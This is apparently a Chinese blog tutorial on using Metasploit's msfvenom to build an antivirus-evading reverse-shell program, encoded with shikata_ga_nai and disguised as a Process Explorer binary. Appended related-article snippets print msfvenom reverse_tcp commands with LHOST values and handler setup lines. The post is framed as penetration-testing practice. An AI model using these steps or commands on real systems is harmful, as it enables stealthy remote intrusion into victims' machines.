Metasploit生成免杀恶意程序

最新推荐文章于 2022-07-18 15:44:07 发布
最新推荐文章于 2022-07-18 15:44:07 发布
阅读量1.4k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maoyeyedezhihui/article/details/90049117
版权
1.注意事项

以下渗透测试坏境需要windows xp sp3,之前用的sp2,程序执行时一直报错提示找不到kernel.dll,其实是sp2系统不支持,是系统自身的问题。

2.生成独立运行的二进制文件

在演示免杀技术之前,先用MSF攻击载荷生成器(msfvenom)创建一个可独立运行的Metasploit载荷程序。在此,选择创建一个反弹shell程序,它能够回连到攻击机,并弹出一个命令行shell。

3.躲避杀毒软件的检测

避免被查杀的最佳方法之一是使用MSF编码器(集成入msfvenom功能程序)对我们的攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序功能不会受到任何影响。和电子邮件附件使用Base64重新编码类似,MSF编码器将原始的可执行文件重新编码,并生成一个新的二进制文件。当这个文件运行后,MSF编码器会将原始程序解码到内存中执行。

4.渗透测试过程

(1)使用 -p 指定使用的攻击载荷模块
在这里插入图片描述
2.使用 -e 指定使用x86/shikata_ga_nai编码器
在这里插入图片描述
3.使用 -x 标志指定下载的Process Explorer二进制文件作为我们自定义模板
在这里插入图片描述
4.选项 -i 表示进行5次反复编码
在这里插入图片描述
5.选项 -f 表示输出格式,选项 -o 指定输出文件名

在这里插入图片描述
6.编码完成后,我们启动multi/handler模块对入站的连接进行监听
在这里插入图片描述
7.靶机运行可执行二进制文件
在这里插入图片描述
8.成功打开了一个远程shell
在这里插入图片描述

忘带剑的侠客
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit reverse Shell的免杀(炊少教学)
weiliang369的博客
02-25 327
rootkithat是我以前的马甲 以前写的文章 我们先生成一个X64的WINDOWS XP 的reverse SHELL 1 2 root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/ meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe 提示:你可以用 scheduleme -m 1 -u e /tm
Metasploit免杀
PortugalCR7的博客
06-29 599
本次实验中不管是利用msf中的编码器进行编码还是用加壳脚本,目的都是要绕过Windows系统的查杀,但还是不能够逃过杀毒系统的检测,故还是要寻找更好的方式来进行免杀。把cr7.exe放入靶机中运行(成功)(杀毒软件报毒)利用msf自带编码器进行编码免杀。利用msf自带编码器进行编码免杀
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5160
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
渗透测试(二)-Metasploit生成免杀后门(外网篇)
阿航的博客
05-25 1269
1. Sunny-Ngrok 开通隧道 首先在官网注册会员 登陆 选择要开通的服务器 这里我们选择美国Ngrok免费服务器 选择tcp协议,填一个可以使用的端口号。 开通隧道后可以在 隧道管理 中看到自己的隧道信息: 记住这里的 隧道id,赠送域名 以及 隧道端口,下面会用到。 2. 启动隧道 首先在kali linux中下载对应的客户端,选择Linux 64位版本。 启动隧道: ./sunny clienti..
Metasploit免杀初探索
mingyqf的博客
12-05 392
Metasploit免杀初探索 转载链接:https://zhuanlan.zhihu.com/p/222968474 安全狗 安全狗 领先的云安全服务与解决方案提供商 2 人赞同了该文章 0x01 环境搭建 测试系统:windows10 (1909) 杀毒软件:360安全卫士 在线杀毒:VT 0x02 payload生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe
使用Python进行防病毒免杀解析
12-23
在网络安全和渗透测试...在实际应用中,还需要不断更新和改进免杀技术,以应对不断进化的反恶意软件解决方案。同时,作为安全从业者,我们应始终遵守合法和道德的测试原则,确保我们的活动不会对非目标系统造成损害。
Metasploit 实现木马生成、捆绑及免杀-内含源码以及设计说明书(可以自己运行复现).zip
最新发布
05-08
**Metasploit 实现木马生成、捆绑及免杀** Metasploit 是一个开源的安全漏洞测试框架,广泛用于渗透测试和安全研究。本教程将深入探讨如何利用 Metasploit 来创建、捆绑木马以及实现免杀技术。通过源码分析和设计...
最强的免杀软件工具
12-10
在IT安全领域,免杀软件工具是至关重要的一个部分,它们的设计目的是帮助用户绕过安全检测系统,使得恶意软件或合法程序能够在不被检测到的情况下运行。这些工具通常被网络犯罪分子用来逃避反病毒软件的检测,但也...
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
06-24
- 使用Metasploit生成针对Linux系统的恶意软件。 - 在成功植入木马后,了解如何利用现有漏洞尝试权限提升。 - 学习如何在受感染主机上执行常见的渗透测试任务。 #### 二、环境配置与准备 在开始本课程之前,请确保...
metasploit-webapp-nostarch.zip
08-12
Metasploit渗透测试指南》中的“nostarch1.zip”是一个专门用于Web应用程序安全测试的资源包,它结合了Metasploit框架,帮助安全专家和研究人员模拟真实世界的网络攻击,以便发现并修复潜在的安全漏洞。Metasploit...
Metasploit学习之免杀技术
习惯积淀的博客
01-12 473
文章目录面杀技术使用msf攻击载荷生成器创建可独立运行的二进制文件躲避杀毒软件的检测 面杀技术 使用msf攻击载荷生成器创建可独立运行的二进制文件 msfpayload windows/shell_reverse_tcp O 使用O选项来查看可用的参数 msfpayload windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=31337 X /va...
免杀】————3、Excel 和 Metasploit免杀
Fly_鹏程万里
03-07 933
这篇文章主要介绍以Excel文件为载体,生成meterpreter反向shell的不同方法。 简介 这篇文章会继续讨论反向shell和规避杀毒软件的方法。有兴趣的可以看我的前一篇文章。随着时间飞逝,以前一些很好的绕过杀毒软件的方法现在均已失效。所以,我必须找到一种新的方法来隐藏我的反向shell。让我们开始吧…… …古老而简单的方法可能是最好的… 通过SMB_Deliver开启一个me...
利用metasploit生成免杀后门
mirror97black的博客
01-26 5626
免杀 之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木马有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。 免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软 静态免杀 静态免杀是能够绕过杀软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、进程注入等。 使
免杀测试】Kali之Metasploit几款工具免杀练习
热门推荐
朔方飞絮谈安全
01-11 1万+
余磊  不知攻,焉知防。作为渗透测试攻城狮,实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过杀毒软件。 下面就尝试测试有关工具的免杀效果,三款工具为,shellter,Veil,  Avet 01 shellter Shellter采用了动
metasploit生成木马获取windowns控制权(非免杀版)
奇葩
12-06 986
转载连接:https://zhuanlan.zhihu.com/p/66785692 写在前面 本想介绍几种生成免杀木马的方法,但经过实验发现这几种方法已经失效,可以被360或者腾讯安全管家查杀。所以本文的木马不具备免杀功能。 准备环境: 入侵机器:kali linux (IP地址:192.168.96.128) 靶机:window server 2003 (IP地址:192.168.96.1...
远控免杀从入门到实践(2)工具总结篇
weixin_46236101的博客
03-13 2468
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实.
Metasploit(一)
weixin_45778886的博客
10-31 7824
Metasploit 开启监听 msfconsole -q:快速打开 use exploit/multi/handler:使用侦听模块 show options:查看模块配置 set LHOST 本地IP:设置监听IP set LPORT 端口:设置端口 set payload windows/meterpreter/reverse_tcp:设置payload run/exploit 生成后门 msfvenom -h :查看帮助 msfvenom -l formats:查看可用文件类型 msfveno
Veil-Evasion安装及使用
渗透测试
08-03 1913
Veil-Evasion安装及使用 1.安装veil apt-get install veil 安装过程中有需要安装的软件全部点下一步即可 如果安装完有任何错误,可以cd到/usr/share/veil-evasion/setup/目录下重新启动setup.sh脚本 cd /usr/share/veil-evasion/setup/ ./setup.sh 过程和上一步相同,安装完成后,输入veil出现以下画面,说明安装成功
内网渗透-Metasploit之——基本后渗透命令
lza20001103的博客
07-18 526
内网渗透-Metasploit之——基本后渗透命令
Metasploit渗透测试框架使用教程
Metasploit的核心功能包括负载控制、编码器、无操作生成器和漏洞整合,使得研究人员能够深入研究高风险漏洞。该框架包含了大量预构建的溢出攻击程序和辅助工具,简化了安全漏洞检测的过程,同时也为开发者提供了丰富...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值